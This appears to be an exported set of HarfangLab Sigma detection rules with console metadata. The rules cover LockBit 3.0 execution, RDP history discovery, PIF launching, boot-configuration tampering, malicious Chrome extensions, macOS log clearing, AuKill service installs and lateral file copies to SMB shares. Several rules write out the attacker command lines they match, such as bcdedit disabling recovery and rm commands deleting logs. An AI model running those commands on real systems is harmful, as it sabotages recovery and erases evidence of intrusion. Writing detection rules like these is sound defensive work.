"content": "title: LockBit 3.0 Ransomware Executed\nid: 3b29a0f1-1ed0-42f2-a31e-f0496a442c96\ndescription: |\n Detects a specific command-line related to the execution of the LockBit 3.0 ransomware.\n LockBit 3.0, also named LockBit Black, was released in March 2022.\n This new variant requires a password to unpack the original text section, a technique similar to the one employed by BlackCat.\n It is recommended to quickly isolate the target machine and to activate your incident response plan.\nreferences:\n - https://laurentiu-raducu.medium.com/lockbit-3-0-ransomware-analysis-198b1d4b75a3\n - https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a\n - https://attack.mitre.org/techniques/T1486/\ndate: 2024/05/22\nmodified: 2025/03/06\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1480.001\n - attack.impact\n - attack.t1486\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Ransomware.LockBit\n - classification.Windows.Behavior.Encryption\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n CommandLine|contains: ' -k LocalServiceNetworkRestricted -pass '\n\n condition: selection\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3b29a0f1-1ed0-42f2-a31e-f0496a442c96",
"rule_name": "LockBit 3.0 Ransomware Executed",
"rule_description": "Detects a specific command-line related to the execution of the LockBit 3.0 ransomware.\nLockBit 3.0, also named LockBit Black, was released in March 2022.\nThis new variant requires a password to unpack the original text section, a technique similar to the one employed by BlackCat.\nIt is recommended to quickly isolate the target machine and to activate your incident response plan.\n",
"rule_creation_date": "2024-05-22",
"rule_modified_date": "2025-03-06",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.impact"
],
"rule_technique_tags": [
"attack.t1480.001",
"attack.t1486"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3b3dd805-29d5-4f12-8de6-0e15e060d9ab",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.605991Z",
"creation_date": "2026-03-23T11:45:34.605995Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.606003Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://learn.microsoft.com/en-us/troubleshoot/windows-server/remote/remove-entries-from-remote-desktop-connection-computer",
"https://attack.mitre.org/techniques/T1021/001/",
"https://attack.mitre.org/techniques/T1018/"
],
"name": "t1021_001_rdp_history.yml",
"content": "title: RDP History Discovered via Registry\nid: 3b3dd805-29d5-4f12-8de6-0e15e060d9ab\ndescription: |\n Detects the query of a registry key containing the history of RDP sessions.\n This can be used by attackers to discover RDP-accessible computers from the currently infected host for future lateralization.\n It is recommended to investigate the parent process for other suspicious actions.\nreferences:\n - https://learn.microsoft.com/en-us/troubleshoot/windows-server/remote/remove-entries-from-remote-desktop-connection-computer\n - https://attack.mitre.org/techniques/T1021/001/\n - https://attack.mitre.org/techniques/T1018/\ndate: 2022/12/02\nmodified: 2025/01/28\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1021.001\n - attack.t1018\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Reg\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\reg.exe'\n - OriginalFileName: 'reg.exe'\n selection_cmd:\n CommandLine|contains|all:\n - ' query '\n - '\\Software\\Microsoft\\Terminal Server Client\\Default'\n\n condition: all of selection_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3b3dd805-29d5-4f12-8de6-0e15e060d9ab",
"rule_name": "RDP History Discovered via Registry",
"rule_description": "Detects the query of a registry key containing the history of RDP sessions.\nThis can be used by attackers to discover RDP-accessible computers from the currently infected host for future lateralization.\nIt is recommended to investigate the parent process for other suspicious actions.\n",
"rule_creation_date": "2022-12-02",
"rule_modified_date": "2025-01-28",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1018",
"attack.t1021.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3b65bce7-bd24-4c84-8667-bdb959aed034",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.083035Z",
"creation_date": "2026-03-23T11:45:34.083037Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.083041Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://blog.delivr.to/analysis-of-an-agenttesla-pif-sample-ad3785ff1609",
"https://attack.mitre.org/techniques/T1204/002/"
],
"name": "t1204_002_susp_pif_file_execution.yml",
"content": "title: Pif File Executed\nid: 3b65bce7-bd24-4c84-8667-bdb959aed034\ndescription: |\n Detects the execution of a pif (Program Information File) file, a type of file associated with older MS-DOS and Windows operating systems.\n These files were particularly useful during the era of Windows 3.x but are largely obsolete in modern versions of Windows and is often exploited by adversaries to mask their malicious binary.\n It is recommended to verify the legitimacy of the binary.\nreferences:\n - https://blog.delivr.to/analysis-of-an-agenttesla-pif-sample-ad3785ff1609\n - https://attack.mitre.org/techniques/T1204/002/\ndate: 2024/11/07\nmodified: 2025/01/29\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1204.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Masquerading\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n ProcessName|endswith: '.pif'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3b65bce7-bd24-4c84-8667-bdb959aed034",
"rule_name": "Pif File Executed",
"rule_description": "Detects the execution of a pif (Program Information File) file, a type of file associated with older MS-DOS and Windows operating systems.\nThese files were particularly useful during the era of Windows 3.x but are largely obsolete in modern versions of Windows and is often exploited by adversaries to mask their malicious binary.\nIt is recommended to verify the legitimacy of the binary.\n",
"rule_creation_date": "2024-11-07",
"rule_modified_date": "2025-01-29",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1204.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3ba75314-ca70-44d1-9965-f04a78999361",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.071298Z",
"creation_date": "2026-03-23T11:45:34.071302Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.071307Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://micahbabinski.medium.com/catching-a-wev-tutil-threat-detection-for-the-rest-of-us-f692f01efcd4",
"https://attack.mitre.org/techniques/T1490/"
],
"name": "t1490_boot_configuration_modified.yml",
"content": "title: Boot Configuration Modified\nid: 3ba75314-ca70-44d1-9965-f04a78999361\ndescription: |\n Detects bcdedit.exe used to modify and/or delete critical boot configuration data.\n Attackers can modify the boot configuration to disrupt system recovery in the event of corruption.\n It is recommended to look for other malicious actions taken by the parent of bcdedit.exe and to investigate the execution context to determine the legitimacy of this action.\nreferences:\n - https://micahbabinski.medium.com/catching-a-wev-tutil-threat-detection-for-the-rest-of-us-f692f01efcd4\n - https://attack.mitre.org/techniques/T1490/\ndate: 2020/10/08\nmodified: 2025/04/22\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1490\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.SystemModification\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bcdedit:\n - Image|endswith: '\\bcdedit.exe'\n - OriginalFileName: 'bcdedit.exe'\n\n selection_set:\n CommandLine|contains: 'set '\n\n selection_recovery:\n # bcdedit /set {default} recoveryenabled No\n CommandLine|contains|all:\n - 'recoveryenabled'\n - 'no'\n\n selection_bootstatuspolicy_1:\n # bcdedit /set {default} bootstatuspolicy IgnoreAllFailures\n CommandLine|contains: 'bootstatuspolicy'\n\n selection_bootstatuspolicy_2:\n CommandLine|contains:\n - 'IgnoreAllFailures'\n - 'IgnoreShutdownFailures'\n - 'IgnoreCheckpointFailures'\n - 'IgnoreBootFailures'\n\n exclusion_programfiles:\n - ParentImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n - GrandparentImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n - CurrentDirectory|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_uwfmgr:\n # https://learn.microsoft.com/en-us/windows-hardware/customize/enterprise/uwf-turnonuwf\n # command is also launched using WMI...\n ProcessGrandparentCommandLine:\n # uwfmgr filter enable / ?:\\windows\\system32\\uwfmgr.exe filter enable\n - '*uwfmgr* filter enable'\n - '?:\\Windows\\system32\\wbem\\wmiprvse.exe -Embedding'\n ProcessCommandLine: '?:\\Windows\\system32\\bcdedit.exe /set {bootloadersettings} BOOTSTATUSPOLICY IgnoreAllFailures'\n\n exclusion_deep_freeze:\n ProcessParentImage: '?:\\Windows\\Temp\\DeepFreeze_C.exe'\n\n exclusion_rufus:\n CommandLine: '?:\\windows\\system32\\bcdedit.exe /store ?:\\EFI\\Microsoft\\Boot\\BCD /set {default} recoveryenabled no'\n ParentImage|contains: 'rufus'\n\n condition: selection_bcdedit and selection_set and (selection_recovery or all of selection_bootstatuspolicy_*) and not 1 of exclusion_*\nlevel: high\n#level: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3ba75314-ca70-44d1-9965-f04a78999361",
"rule_name": "Boot Configuration Modified",
"rule_description": "Detects bcdedit.exe used to modify and/or delete critical boot configuration data.\nAttackers can modify the boot configuration to disrupt system recovery in the event of corruption.\nIt is recommended to look for other malicious actions taken by the parent of bcdedit.exe and to investigate the execution context to determine the legitimacy of this action.\n",
"rule_creation_date": "2020-10-08",
"rule_modified_date": "2025-04-22",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1490"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3bac3ff7-b800-4f05-bd5f-a24cf8d1a898",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.089901Z",
"creation_date": "2026-03-23T11:45:34.089903Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.089908Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://cloud.google.com/blog/topics/threat-intelligence/lnk-between-browsers/",
"https://www.trendmicro.com/fr_fr/research/23/k/parasitesnatcher-how-malicious-chrome-extensions-target-brazil-.html",
"https://attack.mitre.org/techniques/T1176/"
],
"name": "t1176_chrome_extensions_load.yml",
"content": "title: Suspicious Extensions Loaded by Chrome-based Browser (Windows)\nid: 3bac3ff7-b800-4f05-bd5f-a24cf8d1a898\ndescription: |\n Detects a Chrome-based browser launched with a specific argument that permits to load extensions from a specific folder.\n Adversaries may replace legitimate browser shortcuts with one that will load a malicious extension on process startup.\n It is recommended to check the content of the folder specified in the load-extension parameter for malicious extensions.\nreferences:\n - https://cloud.google.com/blog/topics/threat-intelligence/lnk-between-browsers/\n - https://www.trendmicro.com/fr_fr/research/23/k/parasitesnatcher-how-malicious-chrome-extensions-target-brazil-.html\n - https://attack.mitre.org/techniques/T1176/\ndate: 2024/10/09\nmodified: 2025/02/19\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1176\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.SensitiveInformation\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n CommandLine|re: '--load-extension=[^ ]'\n ProcessParentName: 'explorer.exe'\n\n filter_share:\n CommandLine|contains: '--load-extension=\\\\\\\\'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3bac3ff7-b800-4f05-bd5f-a24cf8d1a898",
"rule_name": "Suspicious Extensions Loaded by Chrome-based Browser (Windows)",
"rule_description": "Detects a Chrome-based browser launched with a specific argument that permits to load extensions from a specific folder.\nAdversaries may replace legitimate browser shortcuts with one that will load a malicious extension on process startup.\nIt is recommended to check the content of the folder specified in the load-extension parameter for malicious extensions.\n",
"rule_creation_date": "2024-10-09",
"rule_modified_date": "2025-02-19",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1176"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3bac97ee-c6e6-4ca8-b70f-42535dcd471c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.093282Z",
"creation_date": "2026-03-23T11:45:34.093284Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.093288Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1070/002/"
],
"name": "t1070_002_clear_logs_macos.yml",
"content": "title: Logs Cleared\nid: 3bac97ee-c6e6-4ca8-b70f-42535dcd471c\ndescription: |\n Detects system or user logs being cleared.\n Attackers may clear logs to hide evidence of an intrusion.\n It is recommended to investigate whether this action was legitimate.\nreferences:\n - https://attack.mitre.org/techniques/T1070/002/\ndate: 2022/11/23\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1070.002\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.Deletion\n - classification.macOS.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection_binary1:\n Image:\n - '/bin/rm'\n - '/bin/unlink'\n - '/bin/dd'\n - '/usr/bin/truncate'\n\n selection_binary2:\n Image:\n - '/bin/cat'\n - '/bin/echo'\n CommandLine|contains: \">\"\n\n selection_log:\n CommandLine|contains:\n - '/var/log'\n # Catch /Library/Logs/ and /Users/user/Library/Logs/\n - '/Library/Logs/'\n\n selection_susp_ancestors:\n ProcessAncestors|contains:\n # folder\n - '/users/shared/'\n - '/private/tmp/'\n - '/private/var/tmp/'\n - '/private/etc/'\n - '/private/var/root/'\n - '/Volumes/'\n # process\n - '/osascript'\n\n exclusion_eset:\n CommandLine|startswith: 'rm -rf /Library/Logs/Eset/'\n CurrentDirectory: '/private/var/folders/zz/*'\n\n exclusion_zoom:\n CommandLine: 'rm -f /Library/Logs/zoomusinstall.log'\n CurrentDirectory: '/private/tmp/PKInstallSandbox.*'\n\n exclusion_microsoft:\n CommandLine:\n - '/bin/rm -rf /var/log/com.microsoft.mdatp'\n - '/bin/rm -f /var/log/microsoft_defender_err.log'\n - '/bin/rm -f /var/log/microsoft_defender.log'\n - '/bin/rm -f /var/log/microsoft_defender_telemetryd.log'\n - '/bin/rm -f /var/log/microsoft_defender_telemetryd_err.log'\n - '/bin/rm -f /var/log/fresno\\*.log'\n\n exclusion_nx1:\n CommandLine:\n - '/bin/bash /applications/nomachine.app/contents/frameworks/scripts/setup/nxnode --install'\n - '/bin/bash /applications/nomachine.app/contents/frameworks/scripts/setup/nxserver --install'\n - '/bin/bash /applications/nomachine.app/contents/frameworks/scripts/setup/nxplayer --install'\n - '/bin/bash /applications/nomachine.app/contents/frameworks/scripts/setup/nxrunner --install'\n\n exclusion_nx2:\n CommandLine|contains|all:\n - '/bin/echo NX> 700'\n - '/Library/Application Support/NoMachine/var/log'\n\n exclusion_commandline:\n CommandLine:\n - 'rm /var/log/dsijamf//UR1_applications.log'\n - 'rm -f /Applications/MAMP/Library/logs/fastcgi/nginxFastCGI.sock'\n - 'rm -f /Applications/MAMP/Library/logs/nginxFastCGI.pid'\n - 'rm -rf /Library/Logs/DiagnosticReports/Retired/macOS InstantView\\*.ips'\n - 'rm -rf /Library/Logs/DiagnosticReports/macOS InstantView\\*.crash'\n - 'rm -rf /Library/Logs/DiagnosticReports/macOS InstantView\\*.ips'\n - 'rm -rf /Users/*/Library/Logs/DiagnosticReports/Retired/macOS InstantView\\*.ips'\n - 'rm -rf /Users/*/Library/Logs/DiagnosticReports/macOS InstantView\\*.crash'\n - 'rm -rf /Users/*/Library/Logs/DiagnosticReports/macOS InstantView\\*.ips'\n - 'rm -rf /var/log/fctinstallpost.log'\n - 'rm -f /Library/Logs/VMware/VMware Horizon Client/vmware-view-usb-service.log'\n - 'rm -rf /Users/gaetan/Library/Logs/Eset/RemoteAdministrator/EraAgentInstaller.log'\n\n exclusion_jamf:\n - ProcessAncestors|contains: '/usr/local/jamf/bin/jamf'\n - ProcessParentCommandLine|contains: '/Library/Application Support/JAMF/tmp/'\n\n exclusion_installer:\n ProcessParentCommandLine|startswith: '/bin/sh /tmp/PKInstallSandbox.??????/'\n\n condition: 1 of selection_binary* and selection_log and selection_susp_ancestors and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3bac97ee-c6e6-4ca8-b70f-42535dcd471c",
"rule_name": "Logs Cleared",
"rule_description": "Detects system or user logs being cleared.\nAttackers may clear logs to hide evidence of an intrusion.\nIt is recommended to investigate whether this action was legitimate.\n",
"rule_creation_date": "2022-11-23",
"rule_modified_date": "2025-04-14",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1070.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3bb878f5-2c04-4eea-95f3-66a02b04a863",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.595665Z",
"creation_date": "2026-03-23T11:45:34.595669Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.595676Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://news.sophos.com/en-us/2023/04/19/aukill-edr-killer-malware-abuses-process-explorer-driver/",
"https://attack.mitre.org/techniques/T1569/002"
],
"name": "t1569_002_aukill_service_installed.yml",
"content": "title: AuKill Service Installed\nid: 3bb878f5-2c04-4eea-95f3-66a02b04a863\ndescription: |\n Detects the installation of the AuKill service.\n AuKill is a defense solution killer that uses a Process Explorer vulnerable driver to terminate security solutions' processes and services, and to unload their drivers.\n It registers itself as a service to establish persistence.\n It is recommended to investigate for other suspicious activities surrounding this event.\nreferences:\n - https://news.sophos.com/en-us/2023/04/19/aukill-edr-killer-malware-abuses-process-explorer-driver/\n - https://attack.mitre.org/techniques/T1569/002\ndate: 2023/04/24\nmodified: 2025/02/19\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1569.002\n - classification.Windows.Source.EventLog\n - classification.Windows.Malware.AuKill\n - classification.Windows.Behavior.VulnerableDriver\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n service: system\ndetection:\n selection:\n EventID: 7045\n ServiceName:\n - 'MSDriverSrv'\n - 'aSophos'\n - 'aSophosX'\n - 'auSophos'\n - 'aBase'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3bb878f5-2c04-4eea-95f3-66a02b04a863",
"rule_name": "AuKill Service Installed",
"rule_description": "Detects the installation of the AuKill service.\nAuKill is a defense solution killer that uses a Process Explorer vulnerable driver to terminate security solutions' processes and services, and to unload their drivers.\nIt registers itself as a service to establish persistence.\nIt is recommended to investigate for other suspicious activities surrounding this event.\n",
"rule_creation_date": "2023-04-24",
"rule_modified_date": "2025-02-19",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1569.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3bb903c4-6183-4e4b-af21-b67c40c67995",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.090378Z",
"creation_date": "2026-03-23T11:45:34.090380Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.090384Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://www.bitdefender.com/files/News/CaseStudies/study/421/Bitdefender-PR-Whitepaper-IndEs-creat6269-en-EN.pdf",
"https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf",
"https://attack.mitre.org/techniques/T1105/",
"https://attack.mitre.org/techniques/T1570/"
],
"name": "t1570_pe_move_smb_share.yml",
"content": "title: PE File Copied to an SMB Share\nid: 3bb903c4-6183-4e4b-af21-b67c40c67995\ndescription: |\n Detects copies or moves of executable files to an SMB share.\n This technique may be used by an attacker to copy malicious programs to another machine as a means of moving laterally.\n It is recommended to investigate the process moving the files and the files themselves to determine if they contain malicious tools or indicators.\nreferences:\n - https://www.bitdefender.com/files/News/CaseStudies/study/421/Bitdefender-PR-Whitepaper-IndEs-creat6269-en-EN.pdf\n - https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf\n - https://attack.mitre.org/techniques/T1105/\n - https://attack.mitre.org/techniques/T1570/\ndate: 2023/02/22\nmodified: 2025/10/16\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1570\n - attack.command_and_control\n - attack.t1105\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.Lateralization\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith:\n - '\\xcopy.exe'\n - '\\robocopy.exe'\n # Renamed binaries\n - OriginalFileName:\n - 'xcopy.exe'\n - 'robocopy.exe'\n\n selection_cmdline:\n Image|endswith:\n - '\\cmd.exe'\n - '\\powershell.exe'\n CommandLine|contains:\n - ' copy '\n - ' move '\n - ' mv '\n\n selection_smb_share:\n CommandLine|endswith:\n - ' \\\\\\\\*\\\\*.dll'\n - ' \\\\\\\\*\\\\*.exe'\n\n filter_from_share:\n CommandLine|contains:\n - 'robocopy.exe \\\\\\\\'\n - 'robocopy.exe? \\\\\\\\'\n - 'robocopy.exe?? \\\\\\\\'\n - 'robocopy.exe??? \\\\\\\\'\n - 'xcopy.exe \\\\\\\\'\n - 'xcopy.exe? \\\\\\\\'\n - 'xcopy.exe?? \\\\\\\\'\n - 'xcopy.exe??? \\\\\\\\'\n\n exclusion_dassault:\n ParentImage: '?:\\Program Files\\Dassault Systemes\\3DEXPERIENCE Launcher\\DataSafe\\\\*\\\\*\\1\\inst\\win_b64\\code\\bin\\DSYInsPipeServer.exe'\n\n exclusion_programfiles:\n CommandLine|endswith:\n - ' /c copy *.exe ?:\\Program Files\\\\*\\\\*.exe'\n - ' /c copy *.dll ?:\\Program Files\\\\*\\\\*.dll'\n - ' /c copy *.exe ?:\\Program Files (x86)\\\\*\\\\*.exe'\n - ' /c copy *.dll ?:\\Program Files (x86)\\\\*\\\\*.dll'\n\n exclusion_sccm:\n GrandparentImage: '?:\\MININT\\Tools\\X64\\TsManager.exe'\n\n exclusion_msbuild:\n GrandparentImage:\n - '?:\\Program Files\\Microsoft Visual Studio\\\\*\\MSBuild\\Current\\Bin\\MSBuild.exe'\n - '?:\\Program Files (x86)\\Microsoft Visual Studio\\\\*\\MSBuild\\Current\\Bin\\MSBuild.exe'\n - '?:\\Program Files\\Microsoft Visual Studio\\\\*\\MSBuild\\Current\\Bin\\amd64\\MSBuild.exe'\n - '?:\\Program Files (x86)\\Microsoft Visual Studio\\\\*\\MSBuild\\Current\\Bin\\amd64\\MSBuild.exe'\n\n exclusion_wpkg:\n GrandparentImage: '?:\\Program Files\\wpkg\\WPKGSrv.exe'\n\n condition: ((selection_bin or selection_cmdline) and selection_smb_share) and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3bb903c4-6183-4e4b-af21-b67c40c67995",
"rule_name": "PE File Copied to an SMB Share",
"rule_description": "Detects copies or moves of executable files to an SMB share.\nThis technique may be used by an attacker to copy malicious programs to another machine as a means of moving laterally.\nIt is recommended to investigate the process moving the files and the files themselves to determine if they contain malicious tools or indicators.\n",
"rule_creation_date": "2023-02-22",
"rule_modified_date": "2025-10-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.lateral_movement"
],
